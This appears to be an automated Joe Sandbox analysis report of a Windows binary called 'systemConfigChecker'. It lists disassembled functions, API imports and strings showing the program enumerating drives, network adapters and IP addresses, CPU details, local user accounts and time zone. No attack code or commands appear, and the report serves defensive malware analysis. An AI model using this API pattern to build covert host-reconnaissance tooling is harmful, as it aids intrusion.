              control_flow_graph 1050 7ff64e133780-7ff64e1337fc GetLogicalDrives memset call 7ff64e136810 call 7ff64e1399f0 1055 7ff64e133800-7ff64e13380e 1050->1055 1056 7ff64e13397a-7ff64e133981 1055->1056 1057 7ff64e133814-7ff64e133890 call 7ff64e139610 1055->1057 1056->1055 1058 7ff64e133987-7ff64e1339b4 1056->1058 1063 7ff64e1338c4-7ff64e1338fe GetDiskFreeSpaceExA 1057->1063 1064 7ff64e133892-7ff64e1338a4 1057->1064 1060 7ff64e1339b6-7ff64e1339c0 1058->1060 1061 7ff64e1339e5-7ff64e1339e8 1058->1061 1060->1061 1065 7ff64e1339c2-7ff64e1339d5 1060->1065 1066 7ff64e133a0c-7ff64e133a11 1061->1066 1067 7ff64e1339ea-7ff64e1339f4 1061->1067 1070 7ff64e133900-7ff64e133940 call 7ff64e139820 call 7ff64e1399f0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z call 7ff64e1399f0 1063->1070 1071 7ff64e133941-7ff64e13394a 1063->1071 1068 7ff64e1338a6-7ff64e1338b9 1064->1068 1069 7ff64e1338bf call 7ff64e13b500 1064->1069 1072 7ff64e133a16-7ff64e133a19 1065->1072 1066->1072 1067->1066 1073 7ff64e1339f6-7ff64e133a0a 1067->1073 1068->1069 1074 7ff64e1339d7-7ff64e1339dd _invalid_parameter_noinfo_noreturn 1068->1074 1069->1063 1070->1071 1071->1056 1079 7ff64e13394c-7ff64e13395e 1071->1079 1077 7ff64e133a1b-7ff64e133a23 call 7ff64e1396c0 1072->1077 1078 7ff64e133a24-7ff64e133a96 call 7ff64e137c10 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ call 7ff64e13b4e0 1072->1078 1073->1072 1081 7ff64e1339de-7ff64e1339e4 _invalid_parameter_noinfo_noreturn 1074->1081 1077->1078 1084 7ff64e133960-7ff64e133973 1079->1084 1085 7ff64e133975 call 7ff64e13b500 1079->1085 1081->1061 1084->1081 1084->1085 1085->1056
              APIs
              • GetLogicalDrives.KERNELBASE ref: 00007FF64E1337C5
              • memset.VCRUNTIME140 ref: 00007FF64E1337DA
                • Part of subcall function 00007FF64E136810: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF64E13684A
                • Part of subcall function 00007FF64E136810: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140 ref: 00007FF64E136866
                • Part of subcall function 00007FF64E136810: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF64E136898
                • Part of subcall function 00007FF64E1399F0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,00000000,00000000,?,00007FF64E1319FA), ref: 00007FF64E139A69
                • Part of subcall function 00007FF64E1399F0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,00000000,00000000,?,00007FF64E1319FA), ref: 00007FF64E139A89
                • Part of subcall function 00007FF64E1399F0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF64E1319FA), ref: 00007FF64E139A99
                • Part of subcall function 00007FF64E1399F0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140(?,00000000,00000000,?,00007FF64E1319FA), ref: 00007FF64E139B7C
                • Part of subcall function 00007FF64E1399F0: ?uncaught_exception@std@@YA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF64E1319FA), ref: 00007FF64E139B83
                • Part of subcall function 00007FF64E1399F0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140(?,00000000,00000000,?,00007FF64E1319FA), ref: 00007FF64E139B90
              • GetDiskFreeSpaceExA.KERNELBASE ref: 00007FF64E1338F6
              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z.MSVCP140 ref: 00007FF64E13392B
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF64E1339D7
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF64E1339DE
              • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF64E133A59
              • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF64E133A63
                • Part of subcall function 00007FF64E139610: memcpy.VCRUNTIME140(?,?,?,?,?,00007FF64E131CCF), ref: 00007FF64E139656
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2342658416.00007FF64E131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64E130000, based on PE: true
              • Associated: 00000000.00000002.2342642335.00007FF64E130000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342709444.00007FF64E13E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342733213.00007FF64E145000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342765293.00007FF64E146000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff64e130000_systemConfigChecker.jbxd
              Similarity
              • API ID: U?$char_traits@$D@std@@@std@@$U?$char_traits@_W@std@@@std@@$?good@ios_base@std@@_invalid_parameter_noinfo_noreturn$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_iostream@??6?$basic_ostream@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?uncaught_exception@std@@D@std@@@1@@DiskDrivesFreeLogicalOsfx@?$basic_ostream@_SpaceV01@_V12@V?$basic_streambuf@memcpymemset
              • String ID: GB$Available Drives:
              • API String ID: 2435906160-4081138596
              • Opcode ID: 8aa906d30ff72e81521b83cc95cdf89e0b1fab240ad9aba59166f2e7e3bdb413
              • Instruction ID: 1b0ff73c6725d287488398cb0e772c3d70f264c1e3410bc4018d1238d206028e
              • Opcode Fuzzy Hash: 8aa906d30ff72e81521b83cc95cdf89e0b1fab240ad9aba59166f2e7e3bdb413
              • Instruction Fuzzy Hash: 77919062A5CB8185FB20EB25D4803AD7761FBA5794F505232EA9D93EA9DF3CD181CB00

              Control-flow Graph

              APIs
              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF64E133AEB
              • memset.VCRUNTIME140 ref: 00007FF64E133B01
                • Part of subcall function 00007FF64E136810: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF64E13684A
                • Part of subcall function 00007FF64E136810: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140 ref: 00007FF64E136866
                • Part of subcall function 00007FF64E136810: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF64E136898
              • GetAdaptersInfo.IPHLPAPI ref: 00007FF64E133B19
              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF64E133B28
              • GetAdaptersInfo.IPHLPAPI ref: 00007FF64E133B39
              • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF64E133BC0
              • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF64E133C8E
              • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF64E133C98
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2342658416.00007FF64E131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64E130000, based on PE: true
              • Associated: 00000000.00000002.2342642335.00007FF64E130000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342709444.00007FF64E13E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342733213.00007FF64E145000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342765293.00007FF64E146000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff64e130000_systemConfigChecker.jbxd
              Similarity
              • API ID: U?$char_traits@$D@std@@@std@@$AdaptersInfomalloc$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_iostream@D@std@@@1@@V?$basic_streambuf@freememset
              • String ID: Adapter: $IP Address:
              • API String ID: 1136092572-1613687433
              • Opcode ID: c7edc62ba95c09bb25c762d494fc7f04a23de319ef8496f2bf0b1d9de3c27718
              • Instruction ID: 3399eeb37f0d1b9c2252b9df1ec3eed81ae3556d213b75a49ef7527a0e0abe03
              • Opcode Fuzzy Hash: c7edc62ba95c09bb25c762d494fc7f04a23de319ef8496f2bf0b1d9de3c27718
              • Instruction Fuzzy Hash: F7514772A5DB8682FA10FB15D4802BE6361FBA8B84F404132EA4E97E59DF2CE545CB40

              Control-flow Graph

              APIs
              • GetSystemInfo.KERNELBASE ref: 00007FF64E13359E
              • memset.VCRUNTIME140 ref: 00007FF64E1335B0
                • Part of subcall function 00007FF64E136810: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF64E13684A
                • Part of subcall function 00007FF64E136810: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140 ref: 00007FF64E136866
                • Part of subcall function 00007FF64E136810: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF64E136898
                • Part of subcall function 00007FF64E1399F0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,00000000,00000000,?,00007FF64E1319FA), ref: 00007FF64E139A69
                • Part of subcall function 00007FF64E1399F0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,00000000,00000000,?,00007FF64E1319FA), ref: 00007FF64E139A89
                • Part of subcall function 00007FF64E1399F0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF64E1319FA), ref: 00007FF64E139A99
                • Part of subcall function 00007FF64E1399F0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140(?,00000000,00000000,?,00007FF64E1319FA), ref: 00007FF64E139B7C
                • Part of subcall function 00007FF64E1399F0: ?uncaught_exception@std@@YA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF64E1319FA), ref: 00007FF64E139B83
                • Part of subcall function 00007FF64E1399F0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140(?,00000000,00000000,?,00007FF64E1319FA), ref: 00007FF64E139B90
              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@G@Z.MSVCP140 ref: 00007FF64E1335D7
                • Part of subcall function 00007FF64E1399F0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,00000000,00000000,?,00007FF64E1319FA), ref: 00007FF64E139AE6
                • Part of subcall function 00007FF64E1399F0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140(?,00000000,00000000,?,00007FF64E1319FA), ref: 00007FF64E139B0F
                • Part of subcall function 00007FF64E1399F0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,00000000,00000000,?,00007FF64E1319FA), ref: 00007FF64E139B36
              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z.MSVCP140 ref: 00007FF64E133603
              • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF64E1336DC
              • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF64E1336E6
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2342658416.00007FF64E131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64E130000, based on PE: true
              • Associated: 00000000.00000002.2342642335.00007FF64E130000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342709444.00007FF64E13E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342733213.00007FF64E145000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342765293.00007FF64E146000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff64e130000_systemConfigChecker.jbxd
              Similarity
              • API ID: U?$char_traits@$D@std@@@std@@$U?$char_traits@_W@std@@@std@@$??6?$basic_ostream@?good@ios_base@std@@?sputc@?$basic_streambuf@V01@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_iostream@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@D@std@@@1@@InfoOsfx@?$basic_ostream@_SystemV12@V?$basic_streambuf@memset
              • String ID: Number of Cores: $Processor Architecture:
              • API String ID: 777187999-1490948189
              • Opcode ID: f08b80ed4651fb83f797399b275d32309c9e16663fecaf2ac744f9129df82a99
              • Instruction ID: b5badec532ffb2bf9a735c0dbdb4988fa9e11b0e2d1e7f21ce6acf5827855e9a
              • Opcode Fuzzy Hash: f08b80ed4651fb83f797399b275d32309c9e16663fecaf2ac744f9129df82a99
              • Instruction Fuzzy Hash: 51516E72A48B8189FB10FB65D8802ED2361FBA8B88F504132EA4D97B69DF3CD545CB40

              Control-flow Graph

              APIs
              • memset.VCRUNTIME140 ref: 00007FF64E133D2C
                • Part of subcall function 00007FF64E136810: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF64E13684A
                • Part of subcall function 00007FF64E136810: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140 ref: 00007FF64E136866
                • Part of subcall function 00007FF64E136810: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF64E136898
              • NetUserEnum.NETAPI32 ref: 00007FF64E133D6B
              • NetApiBufferFree.NETAPI32 ref: 00007FF64E133E4A
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF64E133E9F
              • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF64E133F1A
              • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF64E133F24
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2342658416.00007FF64E131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64E130000, based on PE: true
              • Associated: 00000000.00000002.2342642335.00007FF64E130000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342709444.00007FF64E13E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342733213.00007FF64E145000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342765293.00007FF64E146000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff64e130000_systemConfigChecker.jbxd
              Similarity
              • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_iostream@BufferD@std@@@1@@EnumFreeUserV?$basic_streambuf@_invalid_parameter_noinfo_noreturnmemset
              • String ID: User:
              • API String ID: 429987867-381282118
              • Opcode ID: e241ed3e55be39de160f41dced3cc773833e47700fa597e525f9be95238b1d8e
              • Instruction ID: 41d95f9d1e15aca69de5ee6e2bbcd62e777d915657328501c47c909a2e8640c7
              • Opcode Fuzzy Hash: e241ed3e55be39de160f41dced3cc773833e47700fa597e525f9be95238b1d8e
              • Instruction Fuzzy Hash: 07717E72A4CB8186FB10EF69D4802AD67A1FBA5794F504136EA5D93FA9DF3CD481CB00
              APIs
              • GetTimeZoneInformation.KERNELBASE ref: 00007FF64E1341BD
              • memset.VCRUNTIME140 ref: 00007FF64E1341D0
                • Part of subcall function 00007FF64E136810: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF64E13684A
                • Part of subcall function 00007FF64E136810: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140 ref: 00007FF64E136866
                • Part of subcall function 00007FF64E136810: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF64E136898
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF64E13427D
              • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF64E134351
              • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF64E13435B
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2342658416.00007FF64E131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64E130000, based on PE: true
              • Associated: 00000000.00000002.2342642335.00007FF64E130000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342709444.00007FF64E13E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342733213.00007FF64E145000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342765293.00007FF64E146000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff64e130000_systemConfigChecker.jbxd
              Similarity
              • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_iostream@D@std@@@1@@InformationTimeV?$basic_streambuf@Zone_invalid_parameter_noinfo_noreturnmemset
              • String ID: Time Zone:
              • API String ID: 35776714-1239252231
              • Opcode ID: 4828eb79ca3f53f09a541d778c95e189a65ea2713ffe4659dbe92ddbf69477ca
              • Instruction ID: e7f3700f236ee429ff8ea976635721a611e133482b9719c4b374a3714685497a
              • Opcode Fuzzy Hash: 4828eb79ca3f53f09a541d778c95e189a65ea2713ffe4659dbe92ddbf69477ca
              • Instruction Fuzzy Hash: 4E518E72A5CB8585FB20FBA5E4802ED6361FBA5794F404232FA4D93A99DF3CD585CB00

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 933 7ff64e131820-7ff64e13186f memset 934 7ff64e131871 933->934 935 7ff64e131874-7ff64e1318ae call 7ff64e1389e0 933->935 934->935 938 7ff64e131906-7ff64e131941 ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA?AV?$fpos@U_Mbstatet@@@2@XZ ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@_JH@Z 935->938 939 7ff64e1318b0-7ff64e131901 call 7ff64e1399f0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z 935->939 941 7ff64e1319b8-7ff64e1319bd 938->941 942 7ff64e131943-7ff64e131950 938->942 949 7ff64e131a7e-7ff64e131ac6 call 7ff64e137530 ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA@XZ ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ call 7ff64e13b4e0 939->949 943 7ff64e1319c2-7ff64e1319e5 ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@PEAD_J@Z ??7ios_base@std@@QEBA_NXZ 941->943 945 7ff64e131956-7ff64e13195d 942->945 946 7ff64e131acd-7ff64e131b3a call 7ff64e13b060 call 7ff64e137530 ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA@XZ ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ 942->946 947 7ff64e1319e7-7ff64e131a18 call 7ff64e1399f0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z 943->947 948 7ff64e131a52-7ff64e131a59 943->948 951 7ff64e131988-7ff64e131990 call 7ff64e13b508 945->951 952 7ff64e13195f-7ff64e131966 945->952 953 7ff64e131a5d-7ff64e131a7a 947->953 969 7ff64e131a1a-7ff64e131a27 947->969 948->953 966 7ff64e131993-7ff64e1319b6 memset 951->966 958 7ff64e131ac7-7ff64e131acc call 7ff64e131270 952->958 959 7ff64e13196c call 7ff64e13b508 952->959 953->949 958->946 971 7ff64e131971-7ff64e131974 959->971 966->943 975 7ff64e131a29-7ff64e131a3c 969->975 976 7ff64e131a45-7ff64e131a50 call 7ff64e13b500 969->976 972 7ff64e13197a-7ff64e131986 971->972 973 7ff64e131a3e-7ff64e131a44 _invalid_parameter_noinfo_noreturn 971->973 972->966 973->976 975->973 975->976 976->953
              APIs
              • memset.VCRUNTIME140 ref: 00007FF64E131865
              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF64E1318CD
              • ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA?AV?$fpos@U_Mbstatet@@@2@XZ.MSVCP140 ref: 00007FF64E131910
              • ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@_JH@Z.MSVCP140 ref: 00007FF64E131927
              • memset.VCRUNTIME140 ref: 00007FF64E1319A9
                • Part of subcall function 00007FF64E13B508: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF64E13107B), ref: 00007FF64E13B522
              • ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@PEAD_J@Z.MSVCP140 ref: 00007FF64E1319CD
              • ??7ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF64E1319DD
              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF64E131A04
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF64E131A3E
              • ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF64E131A8D
              • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF64E131A97
              • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF64E131AC7
              • ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF64E131B2C
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2342658416.00007FF64E131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64E130000, based on PE: true
              • Associated: 00000000.00000002.2342642335.00007FF64E130000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342709444.00007FF64E13E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342733213.00007FF64E145000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342765293.00007FF64E146000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff64e130000_systemConfigChecker.jbxd
              Similarity
              • API ID: D@std@@@std@@U?$char_traits@$V01@$??1?$basic_istream@??6?$basic_ostream@V01@@memset$??1?$basic_ios@??7ios_base@std@@?read@?$basic_istream@?seekg@?$basic_istream@?tellg@?$basic_istream@Concurrency::cancel_current_taskMbstatet@@@2@V12@V12@_V?$fpos@_invalid_parameter_noinfo_noreturnmalloc
              • String ID: Couldn't open the file$Couldn't read the file
              • API String ID: 2898521299-2967168750
              • Opcode ID: b66de4a07c2a813736083cd489c24eda3bc11b92267668739e2f1c63e06ef200
              • Instruction ID: d90bc59be50aac4616236e0fef1a4392fe0d6b2944e00852806ed6b197e7bf5e
              • Opcode Fuzzy Hash: b66de4a07c2a813736083cd489c24eda3bc11b92267668739e2f1c63e06ef200
              • Instruction Fuzzy Hash: 78915932B4CB8581FB10FB15E8806A97361FB95B94F548632EE5D83BA8DF38E445CB00

              Control-flow Graph

              APIs
              • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF64E131881), ref: 00007FF64E138A20
              • ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF64E138A3F
              • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF64E138A71
              • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF64E138A8C
              • ?_Fiopen@std@@YAPEAU_iobuf@@PEB_WHH@Z.MSVCP140 ref: 00007FF64E138AB6
              • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF64E138AD3
              • _get_stream_buffer_pointers.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF64E138AFA
              • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXPEAPEAD0PEAH001@Z.MSVCP140 ref: 00007FF64E138B21
              • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ.MSVCP140 ref: 00007FF64E138B45
                • Part of subcall function 00007FF64E139FB0: ??0_Lockit@std@@QEAA@H@Z.MSVCP140 ref: 00007FF64E139FDD
                • Part of subcall function 00007FF64E139FB0: ??Bid@locale@std@@QEAA_KXZ.MSVCP140 ref: 00007FF64E139FF7
                • Part of subcall function 00007FF64E139FB0: ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140 ref: 00007FF64E13A029
                • Part of subcall function 00007FF64E139FB0: ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140 ref: 00007FF64E13A054
                • Part of subcall function 00007FF64E139FB0: std::_Facet_Register.LIBCPMT ref: 00007FF64E13A06D
                • Part of subcall function 00007FF64E139FB0: ??1_Lockit@std@@QEAA@XZ.MSVCP140 ref: 00007FF64E13A08C
              • ?always_noconv@codecvt_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF64E138B5A
              • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF64E138B71
              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF64E138BB0
              Memory Dump Source
              • Source File: 00000000.00000002.2342658416.00007FF64E131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64E130000, based on PE: true
              • Associated: 00000000.00000002.2342642335.00007FF64E130000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342709444.00007FF64E13E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342733213.00007FF64E145000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342765293.00007FF64E146000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff64e130000_systemConfigChecker.jbxd
              Similarity
              • API ID: U?$char_traits@$D@std@@@std@@$Init@?$basic_streambuf@$Lockit@std@@$??0?$basic_ios@??0?$basic_istream@??0?$basic_streambuf@??0_??1_?always_noconv@codecvt_base@std@@?getloc@?$basic_streambuf@?setstate@?$basic_ios@_Bid@locale@std@@D@std@@@1@_Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@H001@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@_U_iobuf@@V42@@V?$basic_streambuf@Vfacet@locale@2@Vlocale@2@W@std@@@std@@_get_stream_buffer_pointersstd::_
              • String ID:
              • API String ID: 3818078705-0
              • Opcode ID: f35c13acc3d87238f3b7b1e58bee0d7e5fa0656072ccc1d0c3963a8712f1ca8d
              • Instruction ID: 10a95899e09ceb7d7c0e30e9e3c35e8da132d97b831bad0eba733e68cf85b550
              • Opcode Fuzzy Hash: f35c13acc3d87238f3b7b1e58bee0d7e5fa0656072ccc1d0c3963a8712f1ca8d
              • Instruction Fuzzy Hash: F351393264CB8586FB10AF25E59436977A5FB99B84F144035EB8D83B68DF3CE025CB40

              Control-flow Graph

              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2342658416.00007FF64E131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64E130000, based on PE: true
              • Associated: 00000000.00000002.2342642335.00007FF64E130000.00000002.00000001.01000000.00000003.sdmpDownload File
